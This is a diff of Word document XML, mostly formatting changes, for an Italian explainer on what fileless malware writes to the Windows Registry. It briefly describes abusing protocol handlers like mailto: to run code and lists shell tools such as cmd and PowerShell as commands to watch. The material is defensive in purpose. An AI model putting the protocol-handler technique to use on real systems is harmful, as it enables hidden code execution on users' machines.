-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>command</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="1"/>
-          <w:numId w:val="10"/>
-        </w:numPr>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Esempio:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Creare o modificare protocolli come mailto: o </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>tel</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>: per eseguire codice quando si clicca su un link specifico nel browser.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:br w:type="page"/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:i/>
-          <w:iCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:i/>
-          <w:iCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>Cosa scrivono i fileless malware sui registri</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Come abbiamo visto, i malware fileless sfruttano strumenti legittimi di sistema (Living off the Land </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Binaries</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> o </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>LOLBins</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>) per operare interamente in memoria. Il Registro di Sistema non viene quindi usato per ospitare il malware stesso, ma per memorizzare le istruzioni necessarie a ricostruirlo e avviarlo.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
         </w:rPr>
         <w:br w:type="page"/>
       </w:r>
     </w:p>
     <w:sdt>
       <w:sdtPr>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
         <w:id w:val="-303469538"/>
         <w:docPartObj>
           <w:docPartGallery w:val="Bibliographies"/>
@@ -2271,21 +1079,31 @@
         <w:rPr>
           <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
           <w:color w:val="auto"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
         </w:rPr>
       </w:sdtEndPr>
       <w:sdtContent>
         <w:p>
           <w:pPr>
             <w:pStyle w:val="Titolo1"/>
+            <w:rPr>
+              <w:sz w:val="26"/>
+              <w:szCs w:val="26"/>
+            </w:rPr>
           </w:pPr>
           <w:r>
+            <w:rPr>
+              <w:sz w:val="26"/>
+              <w:szCs w:val="26"/>
+            </w:rPr>
             <w:t>Bibliografia</w:t>
           </w:r>
         </w:p>
         <w:sdt>
           <w:sdtPr>
+            <w:rPr>
+              <w:sz w:val="26"/>
+              <w:szCs w:val="26"/>
+            </w:rPr>
             <w:id w:val="111145805"/>
             <w:bibliography/>
           </w:sdtPr>
@@ -2297,21 +1115,37 @@
                 <w:rPr>
                   <w:noProof/>
                   <w:kern w:val="0"/>
+                  <w:sz w:val="26"/>
+                  <w:szCs w:val="26"/>
                   <w14:ligatures w14:val="none"/>
                 </w:rPr>
               </w:pPr>
               <w:r>
+                <w:rPr>
+                  <w:sz w:val="26"/>
+                  <w:szCs w:val="26"/>
+                </w:rPr>
                 <w:fldChar w:fldCharType="begin"/>
               </w:r>
               <w:r>
+                <w:rPr>
+                  <w:sz w:val="26"/>
+                  <w:szCs w:val="26"/>
+                </w:rPr>
                 <w:instrText>BIBLIOGRAPHY</w:instrText>
               </w:r>
               <w:r>
+                <w:rPr>
+                  <w:sz w:val="26"/>
+                  <w:szCs w:val="26"/>
+                </w:rPr>
                 <w:fldChar w:fldCharType="separate"/>
               </w:r>
               <w:r>
                 <w:rPr>
                   <w:noProof/>
+                  <w:sz w:val="26"/>
+                  <w:szCs w:val="26"/>
                 </w:rPr>
                 <w:t xml:space="preserve">Microsoft. (2025, Gennaio 15). </w:t>
               </w:r>
@@ -2320,12 +1154,16 @@
                   <w:i/>
                   <w:iCs/>
                   <w:noProof/>
+                  <w:sz w:val="26"/>
+                  <w:szCs w:val="26"/>
                 </w:rPr>
                 <w:t>Informazioni sul Registro di sistema di Windows per gli utenti esperti</w:t>
               </w:r>
               <w:r>
                 <w:rPr>
                   <w:noProof/>
+                  <w:sz w:val="26"/>
+                  <w:szCs w:val="26"/>
                 </w:rPr>
                 <w:t>. Tratto da Microsoft Learn: https://learn.microsoft.com/it-it/troubleshoot/windows-server/performance/windows-registry-advanced-users</w:t>
               </w:r>
@@ -2336,12 +1174,16 @@
                 <w:ind w:left="720" w:hanging="720"/>
                 <w:rPr>
                   <w:noProof/>
+                  <w:sz w:val="26"/>
+                  <w:szCs w:val="26"/>
                   <w:lang w:val="en-US"/>
                 </w:rPr>
               </w:pPr>
               <w:r>
                 <w:rPr>
                   <w:noProof/>
+                  <w:sz w:val="26"/>
+                  <w:szCs w:val="26"/>
                   <w:lang w:val="en-US"/>
                 </w:rPr>
                 <w:t xml:space="preserve">Springer Nature. (2020). An emerging threat Fileless malware: a survey and research challenges. </w:t>
@@ -2351,6 +1193,8 @@
                   <w:i/>
                   <w:iCs/>
                   <w:noProof/>
+                  <w:sz w:val="26"/>
+                  <w:szCs w:val="26"/>
                   <w:lang w:val="en-US"/>
                 </w:rPr>
                 <w:t>Springer Nature Link</w:t>
@@ -2358,16 +1202,26 @@
               <w:r>
                 <w:rPr>
                   <w:noProof/>
+                  <w:sz w:val="26"/>
+                  <w:szCs w:val="26"/>
                   <w:lang w:val="en-US"/>
                 </w:rPr>
                 <w:t>. Retrieved from https://link.springer.com/article/10.1186/s42400-019-0043-x</w:t>
               </w:r>
             </w:p>
             <w:p>
+              <w:pPr>
+                <w:rPr>
+                  <w:sz w:val="26"/>
+                  <w:szCs w:val="26"/>
+                </w:rPr>
+              </w:pPr>
               <w:r>
                 <w:rPr>
                   <w:b/>
                   <w:bCs/>
+                  <w:sz w:val="26"/>
+                  <w:szCs w:val="26"/>
                 </w:rPr>
                 <w:fldChar w:fldCharType="end"/>
               </w:r>
@@ -4555,6 +3409,297 @@
         <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
         <w:sz w:val="20"/>
       </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="16" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="6CEC6A36"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="2C88B578"/>
+    <w:lvl w:ilvl="0" w:tplc="0410000F">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04100019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0410001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0410000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04100019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0410001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0410000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04100019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0410001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="17" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="7168611A"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="E1808E96"/>
+    <w:lvl w:ilvl="0" w:tplc="04100001">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04100003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="04100005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="04100001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04100003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="04100005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="04100001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04100003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="04100005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="18" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="76AF5C5E"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="3FAAE8C2"/>
+    <w:lvl w:ilvl="0" w:tplc="D1042C56">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1068" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04100019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1788" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0410001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2508" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0410000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3228" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04100019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3948" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0410001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4668" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0410000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5388" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04100019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6108" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0410001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="6828" w:hanging="180"/>
+      </w:pPr>
     </w:lvl>
   </w:abstractNum>
   <w:num w:numId="1" w16cid:durableId="405763203">
@@ -4621,6 +3766,15 @@
   </w:num>
   <w:num w:numId="16" w16cid:durableId="1215310160">
     <w:abstractNumId w:val="6"/>
+  </w:num>
+  <w:num w:numId="17" w16cid:durableId="480774904">
+    <w:abstractNumId w:val="17"/>
+  </w:num>
+  <w:num w:numId="18" w16cid:durableId="1595555786">
+    <w:abstractNumId w:val="18"/>
+  </w:num>
+  <w:num w:numId="19" w16cid:durableId="1238134191">
+    <w:abstractNumId w:val="16"/>
   </w:num>
 </w:numbering>
 </file>
@@ -5549,6 +4703,35 @@
     <w:unhideWhenUsed/>
     <w:rsid w:val="004C1E3B"/>
   </w:style>
+  <w:style w:type="paragraph" w:styleId="NormaleWeb">
+    <w:name w:val="Normal (Web)"/>
+    <w:basedOn w:val="Normale"/>
+    <w:uiPriority w:val="99"/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00523F8E"/>
+    <w:pPr>
+      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+    </w:pPr>
+    <w:rPr>
+      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+      <w:kern w:val="0"/>
+      <w:lang w:eastAsia="it-IT"/>
+      <w14:ligatures w14:val="none"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:styleId="CodiceHTML">
+    <w:name w:val="HTML Code"/>
+    <w:basedOn w:val="Carpredefinitoparagrafo"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00523F8E"/>
+    <w:rPr>
+      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+      <w:sz w:val="20"/>
+      <w:szCs w:val="20"/>
+    </w:rPr>
+  </w:style>
 </w:styles>
 </file>
 

--- a/Cosa scrivono i malware fileless sui registri.docx
+++ b/Cosa scrivono i malware fileless sui registri.docx
@@ -9,6 +9,7 @@
           <w:bCs/>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
+          <w:u w:val="single"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -174,37 +175,18 @@
     </w:p>
     <w:tbl>
       <w:tblPr>
+        <w:tblStyle w:val="Grigliatabellachiara"/>
         <w:tblW w:w="0" w:type="auto"/>
-        <w:tblCellSpacing w:w="15" w:type="dxa"/>
-        <w:tblBorders>
-          <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-          <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-          <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-          <w:insideH w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-          <w:insideV w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-        </w:tblBorders>
-        <w:tblCellMar>
-          <w:top w:w="15" w:type="dxa"/>
-          <w:left w:w="15" w:type="dxa"/>
-          <w:bottom w:w="15" w:type="dxa"/>
-          <w:right w:w="15" w:type="dxa"/>
-        </w:tblCellMar>
         <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
       </w:tblPr>
       <w:tblGrid>
-        <w:gridCol w:w="7033"/>
-        <w:gridCol w:w="2595"/>
+        <w:gridCol w:w="7029"/>
+        <w:gridCol w:w="2599"/>
       </w:tblGrid>
       <w:tr>
-        <w:trPr>
-          <w:tblHeader/>
-          <w:tblCellSpacing w:w="15" w:type="dxa"/>
-        </w:trPr>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="0" w:type="auto"/>
-            <w:vAlign w:val="center"/>
             <w:hideMark/>
           </w:tcPr>
           <w:p>
@@ -230,7 +212,6 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="0" w:type="auto"/>
-            <w:vAlign w:val="center"/>
             <w:hideMark/>
           </w:tcPr>
           <w:p>
@@ -255,13 +236,9 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:trPr>
-          <w:tblCellSpacing w:w="15" w:type="dxa"/>
-        </w:trPr>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="0" w:type="auto"/>
-            <w:vAlign w:val="center"/>
             <w:hideMark/>
           </w:tcPr>
           <w:p>
@@ -299,7 +276,6 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="0" w:type="auto"/>
-            <w:vAlign w:val="center"/>
             <w:hideMark/>
           </w:tcPr>
           <w:p>
@@ -320,13 +296,9 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:trPr>
-          <w:tblCellSpacing w:w="15" w:type="dxa"/>
-        </w:trPr>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="0" w:type="auto"/>
-            <w:vAlign w:val="center"/>
             <w:hideMark/>
           </w:tcPr>
           <w:p>
@@ -364,7 +336,6 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="0" w:type="auto"/>
-            <w:vAlign w:val="center"/>
             <w:hideMark/>
           </w:tcPr>
           <w:p>
@@ -385,13 +356,9 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:trPr>
-          <w:tblCellSpacing w:w="15" w:type="dxa"/>
-        </w:trPr>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="0" w:type="auto"/>
-            <w:vAlign w:val="center"/>
             <w:hideMark/>
           </w:tcPr>
           <w:p>
@@ -454,7 +421,6 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="0" w:type="auto"/>
-            <w:vAlign w:val="center"/>
             <w:hideMark/>
           </w:tcPr>
           <w:p>
@@ -475,13 +441,9 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:trPr>
-          <w:tblCellSpacing w:w="15" w:type="dxa"/>
-        </w:trPr>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="0" w:type="auto"/>
-            <w:vAlign w:val="center"/>
             <w:hideMark/>
           </w:tcPr>
           <w:p>
@@ -535,7 +497,6 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="0" w:type="auto"/>
-            <w:vAlign w:val="center"/>
             <w:hideMark/>
           </w:tcPr>
           <w:p>
@@ -565,13 +526,9 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:trPr>
-          <w:tblCellSpacing w:w="15" w:type="dxa"/>
-        </w:trPr>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="0" w:type="auto"/>
-            <w:vAlign w:val="center"/>
             <w:hideMark/>
           </w:tcPr>
           <w:p>
@@ -618,7 +575,6 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="0" w:type="auto"/>
-            <w:vAlign w:val="center"/>
             <w:hideMark/>
           </w:tcPr>
           <w:p>
@@ -639,13 +595,9 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:trPr>
-          <w:tblCellSpacing w:w="15" w:type="dxa"/>
-        </w:trPr>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="0" w:type="auto"/>
-            <w:vAlign w:val="center"/>
             <w:hideMark/>
           </w:tcPr>
           <w:p>
@@ -676,7 +628,6 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="0" w:type="auto"/>
-            <w:vAlign w:val="center"/>
             <w:hideMark/>
           </w:tcPr>
           <w:p>
@@ -803,30 +754,43 @@
         <w:rPr>
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>I comandi a cui prestare più attenzione sono quelli in cui compare:</w:t>
+          <w:u w:val="single"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">I comandi a cui prestare più </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>attenzione</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> sono quelli in cui compare:</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve">• </w:t>
-      </w:r>
+        <w:pStyle w:val="Paragrafoelenco"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="21"/>
+        </w:numPr>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -834,7 +798,21 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t>cmd</w:t>
+        <w:t>poweshell.exe</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
